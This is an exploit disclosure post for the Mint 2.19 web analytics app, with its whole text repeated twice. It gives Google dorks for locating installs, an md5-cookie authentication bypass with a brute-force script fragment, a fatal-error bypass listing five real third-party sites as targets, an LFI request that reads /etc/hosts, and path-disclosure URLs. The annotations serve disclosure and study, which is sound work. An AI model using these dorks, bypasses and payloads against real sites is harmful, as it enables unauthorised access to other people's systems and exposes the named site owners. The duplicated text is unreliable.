20.04.2014, 19:23
************************************************** ****************************
# App Name: Mint 2.19
# Google Dork(about 1,630,000 results): "Shaun Inman. All rights reserved." intitle:"Mint: "
# Vendor Homepage: www.haveamint.com (http://www.haveamint.com)
************************************************** ****************************/
1. Authentication bypass ("email verification bypass") via a predictable md5(password) token ($_COOKIE and $_GET):
Vulnerable Code(mint.php):
Code:
// Session check. The "session" is a bare, unsalted md5() of the configured
// password, compared with loose ==. Consequences: the cookie value never
// changes (no logout, no rotation), so anyone who captures it stays logged in
// until the password itself changes; a captured value can be cracked offline
// against a wordlist; and, as the POC does, candidates can simply be hashed and
// replayed as the cookie. Loose == additionally compares two numeric-looking
// strings as numbers rather than byte-for-byte (hash_equals() would be correct).
function isLoggedIn()
{
return (isset($_COOKIE['MintAuth']) && $_COOKIE['MintAuth']==md5($this->cfg['password']))?true:false;
}
POC (truncated script excerpt — only the tail of the brute-force loop and the usage banner survive; the request logic behind -check and -bruteforce is cut off above):
Code:
>>>>bruteforce SUCCESSFUL!!! (password=".$current_password.")\n";
exit();
}
}
fclose($file);
echo ">>>>>bruteforce UNsuccessful :(\n";
} else echo "ERROR: ".$passlist." not found!\n";
break;
default:
echo "##### Mint 2.19 email verification bypass\n";
echo "##### Author: Unlog\n";
echo "##### Usage:\n".
"\tmint.php -check www.example.com /mint/\n".
"\tmint.php -bruteforce www.example.com /mint/ passlist.txt\n";
}
?>
Additional Information:
Same vulnerability in authenticateRSS function
Vulnerable Code(mint.php):
Code:
// RSS access check. The token is the very same value as the MintAuth login
// cookie (both are md5 of the configured password), but here it travels in the
// query string, so it lands in web-server/proxy logs, browser history and
// Referer headers; leaking a feed URL is leaking the admin session. Same loose
// == and unsalted-md5 weaknesses as isLoggedIn().
function authenticateRSS()
{
return (isset($_GET['RSS']) && $_GET['RSS'] == md5($this->cfg['password']))?true:false;
}
POC: same as above, but the candidate md5() value is sent as the RSS query parameter instead of the MintAuth cookie.
2. Authentication bypass via the _fatal error_ state:
Info:
If Mint hits a fatal error (e.g. the MySQL server is down), the preferences page is reachable without authentication. The path.php snippet below only shows the early exit into the error handler; the login check presumably lives after this point and is therefore skipped — confirm against the full path.php.
Vulnerable Code(path.php):
Code:
// Early exit on a fatal error (e.g. database unreachable): the error page is
// included and the request ends here. The advisory's point is that in this
// state ?preferences is served without a login. This excerpt alone does not
// show where the authentication check lives; presumably it runs later in
// path.php and is skipped by this exit -- TODO confirm against the full file.
if ($Mint->errors['fatal'])
{
include(MINT_ROOT.'app/paths/errors/index.php');
exit();
}
Google Dork: "Mint was unable to connect" intitle:"Mint:"
POC (the hosts below were live third-party installs at the time of posting; do not send requests to systems you are not authorized to test — substitute your own instance, e.g. http://<your-host>/mint/?preferences):
Code:
http://mint.ryanmccuaig.net/?preferences
http://www.stunda.nl/mint/?preferences
http://dejurka.ru/mint/?preferences
http://www.mad4milk.net/mint/?preferences
http://www.andrewgill.co.za/mint/?preferences
3. LFI in mint.php
Info:
The LFI requires an authenticated preferences session (obtainable via issue 1 or 2), so the request below must also carry a valid MintAuth cookie, which is omitted from the listing. Note that the included path is prefixed with MINT_ROOT, so unless that constant is empty, src=/etc/hosts resolves inside the Mint tree and reaching arbitrary files needs ../ traversal (e.g. src=../../../../etc/hosts). Because the sink is include_once(), any readable local file containing PHP code (an uploaded file, a poisoned log) is executed rather than merely disclosed.
Vulnerable Code:
Code:
mint.php:
function installPepper($pathToPepper)
{
include_once(MINT_ROOT.$pathToPepper);
...
\app\paths\preferences\index.php:
if (isset($_POST['MintPath']) && $_POST['MintPath'] == 'Preferences')
...
switch($_POST['action'])
...
case 'Install Pepper':
$Mint->tmp['pageTitle'] = 'Install Pepper';
$Mint->installPepper($_POST['src']);
POC:
Code:
POST http://***/ HTTP/1.0
Host: ***.com
User-Agent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 58
MintPath=Preferences&action=Install Pepper&src=/etc/hosts&
4. Multiple Full Path Disclosure (direct-access guard redirects but does not exit)
Vulnerable Code:
Code:
// Direct-access guard: on a request that bypasses the front controller (MINT
// undefined) it emits a Location header but never exit()s, so the rest of the
// file still executes without the application bootstrapped. With display_errors
// on, the resulting PHP errors print the absolute path of the script -- the
// full path disclosure listed below. A correct guard terminates the request:
// if (!defined('MINT')) { header('Location: /'); exit; }
if (!defined('MINT')) { header('Location:/'); }; // Prevent viewing this file
POC:
Code:
GET http://localhost/mint/app/includes/foot.php?benchmark
GET http://localhost/mint/app/includes/foot.php?observe
GET http://localhost/mint/app/paths/auth/index.php
GET http://localhost/mint/app/paths/custom/index.php?custom
GET http://localhost/mint/app/paths/custom/index.php?RSS
GET http://localhost/mint/app/paths/display/display.php
GET http://localhost/mint/app/paths/display/index.php?tab
GET http://localhost/mint/app/paths/errors/index.php
GET http://localhost/mint/app/paths/feedback/index.php
GET http://localhost/mint/app/paths/install/configuration.php
GET http://localhost/mint/app/paths/install/instructions.php
POST http://localhost/mint/app/paths/install/index.php | action=Activate
POST http://localhost/mint/app/paths/install/index.php | action=Accept
POST http://localhost/mint/app/paths/install/index.php | action=Configure
etc.
# App Name: Mint 2.19
# Google Dork(about 1,630,000 results): "Shaun Inman. All rights reserved." intitle:"Mint: "
# Vendor Homepage: www.haveamint.com (http://www.haveamint.com)
************************************************** ****************************/
1. Authentication bypass ("email verification bypass") via a predictable md5(password) token ($_COOKIE and $_GET):
Vulnerable Code(mint.php):
Code:
// Session check. The "session" is a bare, unsalted md5() of the configured
// password, compared with loose ==. Consequences: the cookie value never
// changes (no logout, no rotation), so anyone who captures it stays logged in
// until the password itself changes; a captured value can be cracked offline
// against a wordlist; and, as the POC does, candidates can simply be hashed and
// replayed as the cookie. Loose == additionally compares two numeric-looking
// strings as numbers rather than byte-for-byte (hash_equals() would be correct).
function isLoggedIn()
{
return (isset($_COOKIE['MintAuth']) && $_COOKIE['MintAuth']==md5($this->cfg['password']))?true:false;
}
POC (truncated script excerpt — only the tail of the brute-force loop and the usage banner survive; the request logic behind -check and -bruteforce is cut off above):
Code:
>>>>bruteforce SUCCESSFUL!!! (password=".$current_password.")\n";
exit();
}
}
fclose($file);
echo ">>>>>bruteforce UNsuccessful :(\n";
} else echo "ERROR: ".$passlist." not found!\n";
break;
default:
echo "##### Mint 2.19 email verification bypass\n";
echo "##### Author: Unlog\n";
echo "##### Usage:\n".
"\tmint.php -check www.example.com /mint/\n".
"\tmint.php -bruteforce www.example.com /mint/ passlist.txt\n";
}
?>
Additional Information:
Same vulnerability in authenticateRSS function
Vulnerable Code(mint.php):
Code:
// RSS access check. The token is the very same value as the MintAuth login
// cookie (both are md5 of the configured password), but here it travels in the
// query string, so it lands in web-server/proxy logs, browser history and
// Referer headers; leaking a feed URL is leaking the admin session. Same loose
// == and unsalted-md5 weaknesses as isLoggedIn().
function authenticateRSS()
{
return (isset($_GET['RSS']) && $_GET['RSS'] == md5($this->cfg['password']))?true:false;
}
POC: same as above, but the candidate md5() value is sent as the RSS query parameter instead of the MintAuth cookie.
2. Authentication bypass via the _fatal error_ state:
Info:
If Mint hits a fatal error (e.g. the MySQL server is down), the preferences page is reachable without authentication. The path.php snippet below only shows the early exit into the error handler; the login check presumably lives after this point and is therefore skipped — confirm against the full path.php.
Vulnerable Code(path.php):
Code:
// Early exit on a fatal error (e.g. database unreachable): the error page is
// included and the request ends here. The advisory's point is that in this
// state ?preferences is served without a login. This excerpt alone does not
// show where the authentication check lives; presumably it runs later in
// path.php and is skipped by this exit -- TODO confirm against the full file.
if ($Mint->errors['fatal'])
{
include(MINT_ROOT.'app/paths/errors/index.php');
exit();
}
Google Dork: "Mint was unable to connect" intitle:"Mint:"
POC (the hosts below were live third-party installs at the time of posting; do not send requests to systems you are not authorized to test — substitute your own instance, e.g. http://<your-host>/mint/?preferences):
Code:
http://mint.ryanmccuaig.net/?preferences
http://www.stunda.nl/mint/?preferences
http://dejurka.ru/mint/?preferences
http://www.mad4milk.net/mint/?preferences
http://www.andrewgill.co.za/mint/?preferences
3. LFI in mint.php
Info:
The LFI requires an authenticated preferences session (obtainable via issue 1 or 2), so the request below must also carry a valid MintAuth cookie, which is omitted from the listing. Note that the included path is prefixed with MINT_ROOT, so unless that constant is empty, src=/etc/hosts resolves inside the Mint tree and reaching arbitrary files needs ../ traversal (e.g. src=../../../../etc/hosts). Because the sink is include_once(), any readable local file containing PHP code (an uploaded file, a poisoned log) is executed rather than merely disclosed.
Vulnerable Code:
Code:
mint.php:
function installPepper($pathToPepper)
{
include_once(MINT_ROOT.$pathToPepper);
...
\app\paths\preferences\index.php:
if (isset($_POST['MintPath']) && $_POST['MintPath'] == 'Preferences')
...
switch($_POST['action'])
...
case 'Install Pepper':
$Mint->tmp['pageTitle'] = 'Install Pepper';
$Mint->installPepper($_POST['src']);
POC:
Code:
POST http://***/ HTTP/1.0
Host: ***.com
User-Agent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 58
MintPath=Preferences&action=Install Pepper&src=/etc/hosts&
4. Multiple Full Path Disclosure (direct-access guard redirects but does not exit)
Vulnerable Code:
Code:
// Direct-access guard: on a request that bypasses the front controller (MINT
// undefined) it emits a Location header but never exit()s, so the rest of the
// file still executes without the application bootstrapped. With display_errors
// on, the resulting PHP errors print the absolute path of the script -- the
// full path disclosure listed below. A correct guard terminates the request:
// if (!defined('MINT')) { header('Location: /'); exit; }
if (!defined('MINT')) { header('Location:/'); }; // Prevent viewing this file
POC:
Code:
GET http://localhost/mint/app/includes/foot.php?benchmark
GET http://localhost/mint/app/includes/foot.php?observe
GET http://localhost/mint/app/paths/auth/index.php
GET http://localhost/mint/app/paths/custom/index.php?custom
GET http://localhost/mint/app/paths/custom/index.php?RSS
GET http://localhost/mint/app/paths/display/display.php
GET http://localhost/mint/app/paths/display/index.php?tab
GET http://localhost/mint/app/paths/errors/index.php
GET http://localhost/mint/app/paths/feedback/index.php
GET http://localhost/mint/app/paths/install/configuration.php
GET http://localhost/mint/app/paths/install/instructions.php
POST http://localhost/mint/app/paths/install/index.php | action=Activate
POST http://localhost/mint/app/paths/install/index.php | action=Accept
POST http://localhost/mint/app/paths/install/index.php | action=Configure
etc.